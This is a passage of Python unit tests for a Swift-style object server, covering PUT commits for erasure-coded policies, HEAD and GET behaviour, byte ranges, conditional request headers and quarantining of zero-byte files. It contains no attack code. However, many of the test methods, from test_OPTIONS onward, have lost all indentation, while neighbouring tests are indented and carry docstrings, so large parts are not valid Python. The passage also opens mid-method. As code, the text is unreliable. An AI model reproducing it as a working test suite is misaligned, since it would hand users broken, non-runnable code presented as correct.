                storage_directory(diskfile.get_data_dir(int(policy)),
                                  'p', hash_path('a', 'c', 'o')))
            data_file = os.path.join(obj_dir, timestamp) + data_file_tail
            self.assertTrue(os.path.isfile(data_file),
                            'Expected file %r not found in %r for policy %r'
                            % (data_file, os.listdir(obj_dir), int(policy)))
        for policy in POLICIES:
            if policy.policy_type == EC_POLICY:
                # upload with a ec-frag-index
                put_with_index(201, 3)
                # same timestamp will conflict a different ec-frag-index
                put_with_index(409, 2)
                # but with the ssync-frag-index (primary node) it will just
                # save both!
                put_with_index(201, 2, 2)
                # but even with the ssync-frag-index we can still get a
                # timestamp collision if the file already exists
                put_with_index(409, 3, 3)
                # FWIW, ssync will never send in-consistent indexes - but if
                # something else did, from the object server perspective ...
                # ... the ssync-frag-index is canonical on the
                # read/pre-existence check
                put_with_index(409, 7, 2)
                # ... but the ec-frag-index is canonical when it comes to on
                # disk file
                put_with_index(201, 7, 6)
    def test_PUT_commits_data(self):
        """After a successful PUT the committed .data file exists on disk
        for every policy (EC policies include the frag-index suffix)."""
        for policy in POLICIES:
            timestamp = utils.Timestamp(int(time())).internal
            data_file_tail = '.data'
            headers = {'X-Timestamp': timestamp,
                       'Content-Length': '6',
                       'Content-Type': 'application/octet-stream',
                       'X-Backend-Storage-Policy-Index': int(policy)}
            if policy.policy_type == EC_POLICY:
                # commit renames data file
                headers['X-Object-Sysmeta-Ec-Frag-Index'] = '2'
                data_file_tail = '#2#d.data'
            req = Request.blank(
                '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                headers=headers)
            req.body = 'VERIFY'
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 201)
            obj_dir = os.path.join(
                self.testdir, 'sda1',
                storage_directory(diskfile.get_data_dir(int(policy)),
                                  'p', hash_path('a', 'c', 'o')))
            data_file = os.path.join(obj_dir, timestamp) + data_file_tail
            self.assertTrue(os.path.isfile(data_file),
                            'Expected file %r not found in %r for policy %r'
                            % (data_file, os.listdir(obj_dir), int(policy)))
            # Clean up so the next policy starts from an empty dir.
            rmtree(obj_dir)
    def test_HEAD(self):
        # Test swift.obj.server.ObjectController.HEAD
        """HEAD: bad path 400; missing object 404; stored object returns
        its headers; removed .data 404; deleted object 404 with
        X-Backend-Timestamp of the tombstone."""
        req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 400)
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
        self.assertFalse('X-Backend-Timestamp' in resp.headers)
        timestamp = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp,
                     'Content-Type': 'application/x-test',
                     'X-Object-Meta-1': 'One',
                     'X-Object-Meta-Two': 'Two'})
        req.body = 'VERIFY'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.content_length, 6)
        self.assertEqual(resp.content_type, 'application/x-test')
        self.assertEqual(resp.headers['content-type'], 'application/x-test')
        self.assertEqual(
            resp.headers['last-modified'],
            strftime('%a, %d %b %Y %H:%M:%S GMT',
                     gmtime(math.ceil(float(timestamp)))))
        self.assertEqual(resp.headers['etag'],
                         '"0b4c12d7e0a73840c1c4f148fda3b037"')
        self.assertEqual(resp.headers['x-object-meta-1'], 'One')
        self.assertEqual(resp.headers['x-object-meta-two'], 'Two')
        # Remove the .data file behind the server's back -> 404.
        objfile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            utils.Timestamp(timestamp).internal + '.data')
        os.unlink(objfile)
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
        sleep(.00001)
        timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={
                                'X-Timestamp': timestamp,
                                'Content-Type': 'application/octet-stream',
                                'Content-length': '6'})
        req.body = 'VERIFY'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        sleep(.00001)
        timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'DELETE'},
                            headers={'X-Timestamp': timestamp})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 204)
        # HEAD of a deleted object reports the tombstone's timestamp.
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
        self.assertEqual(resp.headers['X-Backend-Timestamp'],
                         utils.Timestamp(timestamp).internal)
    def test_HEAD_quarantine_zbyte(self):
        # Test swift.obj.server.ObjectController.HEAD
        """A zero-byte .data file (metadata only, no body) is quarantined
        on HEAD: 404 is returned and the file moves to the quarantine dir."""
        timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'X-Timestamp': timestamp,
                                     'Content-Type': 'application/x-test'})
        req.body = 'VERIFY'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        disk_file = self.df_mgr.get_diskfile('sda1', 'p', 'a', 'c', 'o',
                                             policy=POLICIES.legacy)
        disk_file.open()
        file_name = os.path.basename(disk_file._data_file)
        # Rewrite the data file with its metadata but zero bytes of body.
        with open(disk_file._data_file) as fp:
            metadata = diskfile.read_metadata(fp)
        os.unlink(disk_file._data_file)
        with open(disk_file._data_file, 'w') as fp:
            diskfile.write_metadata(fp, metadata)
        file_name = os.path.basename(disk_file._data_file)
        self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
        # The broken file must now live under quarantined/objects/<hash>.
        quar_dir = os.path.join(
            self.testdir, 'sda1', 'quarantined', 'objects',
            os.path.basename(os.path.dirname(disk_file._data_file)))
        self.assertEqual(os.listdir(quar_dir)[0], file_name)
def test_OPTIONS(self):
conf = {'devices': self.testdir, 'mount_check': 'false'}
server_handler = object_server.ObjectController(
conf, logger=debug_logger())
req = Request.blank('/sda1/p/a/c/o', {'REQUEST_METHOD': 'OPTIONS'})
req.content_length = 0
resp = server_handler.OPTIONS(req)
self.assertEqual(200, resp.status_int)
for verb in 'OPTIONS GET POST PUT DELETE HEAD REPLICATE \
SSYNC'.split():
self.assertTrue(
verb in resp.headers['Allow'].split(', '))
self.assertEqual(len(resp.headers['Allow'].split(', ')), 8)
self.assertEqual(resp.headers['Server'],
(server_handler.server_type + '/' + swift_version))
def test_GET(self):
# Test swift.obj.server.ObjectController.GET
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
self.assertFalse('X-Backend-Timestamp' in resp.headers)
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test',
'X-Object-Meta-1': 'One',
'X-Object-Meta-Two': 'Two'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.body, 'VERIFY')
self.assertEqual(resp.content_length, 6)
self.assertEqual(resp.content_type, 'application/x-test')
self.assertEqual(resp.headers['content-length'], '6')
self.assertEqual(resp.headers['content-type'], 'application/x-test')
self.assertEqual(
resp.headers['last-modified'],
strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)))))
self.assertEqual(resp.headers['etag'],
'"0b4c12d7e0a73840c1c4f148fda3b037"')
self.assertEqual(resp.headers['x-object-meta-1'], 'One')
self.assertEqual(resp.headers['x-object-meta-two'], 'Two')
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
req.range = 'bytes=1-3'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 206)
self.assertEqual(resp.body, 'ERI')
self.assertEqual(resp.headers['content-length'], '3')
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
req.range = 'bytes=1-'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 206)
self.assertEqual(resp.body, 'ERIFY')
self.assertEqual(resp.headers['content-length'], '5')
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
req.range = 'bytes=-2'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 206)
self.assertEqual(resp.body, 'FY')
self.assertEqual(resp.headers['content-length'], '2')
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.data')
os.unlink(objfile)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
sleep(.00001)
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': timestamp,
'Content-Type': 'application:octet-stream',
'Content-Length': '6'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
sleep(.00001)
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
self.assertEqual(resp.headers['X-Backend-Timestamp'],
utils.Timestamp(timestamp).internal)
def test_GET_if_match(self):
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
etag = resp.etag
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'GET'},
headers={'If-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Match': '"%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Match': '"11111111111111111111111111111111"'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={
'If-Match': '"11111111111111111111111111111111", "%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={
'If-Match':
'"11111111111111111111111111111111", '
'"22222222222222222222222222222222"'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
def test_GET_if_match_etag_is_at(self):
headers = {
'X-Timestamp': utils.Timestamp(time()).internal,
'Content-Type': 'application/octet-stream',
'X-Object-Meta-Xtag': 'madeup',
'X-Object-Sysmeta-Xtag': 'alternate madeup',
}
req = Request.blank('/sda1/p/a/c/o', method='PUT',
headers=headers)
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
real_etag = resp.etag
# match x-backend-etag-is-at
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': 'madeup',
'X-Backend-Etag-Is-At': 'X-Object-Meta-Xtag'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
# match x-backend-etag-is-at, using first in list of alternates
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': 'madeup',
'X-Backend-Etag-Is-At':
'X-Object-Meta-Xtag,X-Object-Sysmeta-Z'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
# match x-backend-etag-is-at, using second in list of alternates
alts = 'X-Object-Sysmeta-Y,X-Object-Meta-Xtag,X-Object-Sysmeta-Z'
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': 'madeup',
'X-Backend-Etag-Is-At': alts})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
# match x-backend-etag-is-at, choosing first of multiple alternates
alts = 'X-Object-Sysmeta-Y,X-Object-Meta-Xtag,X-Object-Sysmeta-Xtag'
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': 'madeup',
'X-Backend-Etag-Is-At': alts})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
# match x-backend-etag-is-at, choosing first of multiple alternates
# (switches order of second two alternates from previous assertion)
alts = 'X-Object-Sysmeta-Y,X-Object-Sysmeta-Xtag,X-Object-Meta-Xtag'
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': 'alternate madeup',
'X-Backend-Etag-Is-At': alts})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
# no match x-backend-etag-is-at
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': real_etag,
'X-Backend-Etag-Is-At': 'X-Object-Meta-Xtag'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
# etag-is-at metadata doesn't exist, default to real etag
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': real_etag,
'X-Backend-Etag-Is-At': 'X-Object-Meta-Missing'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
# sanity no-match with no etag-is-at
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': 'madeup'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
# sanity match with no etag-is-at
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': real_etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
# sanity with no if-match
req = Request.blank('/sda1/p/a/c/o', headers={
'X-Backend-Etag-Is-At': 'X-Object-Meta-Xtag'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
def test_HEAD_if_match(self):
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
etag = resp.etag
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Match': '"%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Match': '"11111111111111111111111111111111"'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'},
headers={
'If-Match': '"11111111111111111111111111111111", "%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'},
headers={
'If-Match':
'"11111111111111111111111111111111", '
'"22222222222222222222222222222222"'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
def test_GET_if_none_match(self):
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': normalize_timestamp(time()),
'X-Object-Meta-Soup': 'gazpacho',
'Content-Type': 'application/fizzbuzz',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
etag = resp.etag
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-None-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
self.assertEqual(resp.etag, etag)
self.assertEqual(resp.headers['Content-Type'], 'application/fizzbuzz')
self.assertEqual(resp.headers['X-Object-Meta-Soup'], 'gazpacho')
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'GET'},
headers={'If-None-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-None-Match': '"%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
self.assertEqual(resp.etag, etag)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-None-Match': '"11111111111111111111111111111111"'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-None-Match':
'"11111111111111111111111111111111", '
'"%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
self.assertEqual(resp.etag, etag)
def test_HEAD_if_none_match(self):
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
etag = resp.etag
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-None-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
self.assertEqual(resp.etag, etag)
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-None-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-None-Match': '"%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
self.assertEqual(resp.etag, etag)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-None-Match': '"11111111111111111111111111111111"'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-None-Match':
'"11111111111111111111111111111111", '
'"%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
self.assertEqual(resp.etag, etag)
    def test_GET_if_modified_since(self):
        """GET with If-Modified-Since: 304 at/after Last-Modified, 200
        before it."""
        # Object creation time; Last-Modified is derived from it.
        timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={
                                'X-Timestamp': timestamp,
                                'Content-Type': 'application/octet-stream',
                                'Content-Length': '4'})
        req.body = 'test'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # Unconditional GET sanity check.
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        # If-Modified-Since one second after creation -> not modified.
        since = strftime('%a, %d %b %Y %H:%M:%S GMT',
                         gmtime(float(timestamp) + 1))
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-Modified-Since': since})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 304)
        # One second before creation -> modified since, full response.
        since = \
            strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) - 1))
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-Modified-Since': since})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        # One second after creation again -> 304.
        since = \
            strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) + 1))
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-Modified-Since': since})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 304)
        # Last-Modified header is the timestamp rounded up to whole seconds.
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        since = resp.headers['Last-Modified']
        self.assertEqual(since, strftime('%a, %d %b %Y %H:%M:%S GMT',
                                         gmtime(math.ceil(float(timestamp)))))
        # If-Modified-Since equal to Last-Modified -> 304.
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-Modified-Since': since})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 304)
        # A second object created at a whole-second timestamp: a conditional
        # GET at exactly that time is also not-modified.
        timestamp = normalize_timestamp(int(time()))
        req = Request.blank('/sda1/p/a/c/o2',
                            environ={'REQUEST_METHOD': 'PUT'},
                            headers={
                                'X-Timestamp': timestamp,
                                'Content-Type': 'application/octet-stream',
                                'Content-Length': '4'})
        req.body = 'test'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        since = strftime('%a, %d %b %Y %H:%M:%S GMT',
                         gmtime(float(timestamp)))
        req = Request.blank('/sda1/p/a/c/o2',
                            environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-Modified-Since': since})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 304)
def test_HEAD_if_modified_since(self):
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': timestamp,
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(float(timestamp) + 1))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
since = \
strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) - 1))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
since = \
strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) + 1))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
since = resp.headers['Last-Modified']
self.assertEqual(since, strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)))))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Modified-Since': since})
resp = self.object_controller.GET(req)
self.assertEqual(resp.status_int, 304)
timestamp = normalize_timestamp(int(time()))
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': timestamp,
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(float(timestamp)))
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
    def test_GET_if_unmodified_since(self):
        """GET with If-Unmodified-Since: succeed at/after Last-Modified,
        412 before it (with object metadata still on the 412)."""
        timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={
                                'X-Timestamp': timestamp,
                                'X-Object-Meta-Burr': 'ito',
                                'Content-Type': 'application/cat-picture',
                                'Content-Length': '4'})
        req.body = 'test'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # Unconditional GET sanity check.
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        # If-Unmodified-Since after creation -> unmodified, 200.
        since = strftime('%a, %d %b %Y %H:%M:%S GMT',
                         gmtime(float(timestamp) + 1))
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-Unmodified-Since': since})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        # Well before creation -> precondition fails; the 412 still carries
        # the object's content-type and user metadata.
        since = \
            strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) - 9))
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-Unmodified-Since': since})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 412)
        self.assertEqual(resp.headers['Content-Type'],
                         'application/cat-picture')
        self.assertEqual(resp.headers['X-Object-Meta-Burr'], 'ito')
        # Well after creation -> 200.
        since = \
            strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) + 9))
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-Unmodified-Since': since})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        # Last-Modified header is the timestamp rounded up to whole seconds;
        # a conditional GET at exactly that value succeeds.
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        since = resp.headers['Last-Modified']
        self.assertEqual(since, strftime('%a, %d %b %Y %H:%M:%S GMT',
                                         gmtime(math.ceil(float(timestamp)))))
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-Unmodified-Since': since})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
def test_HEAD_if_unmodified_since(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)) + 1))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Unmodified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
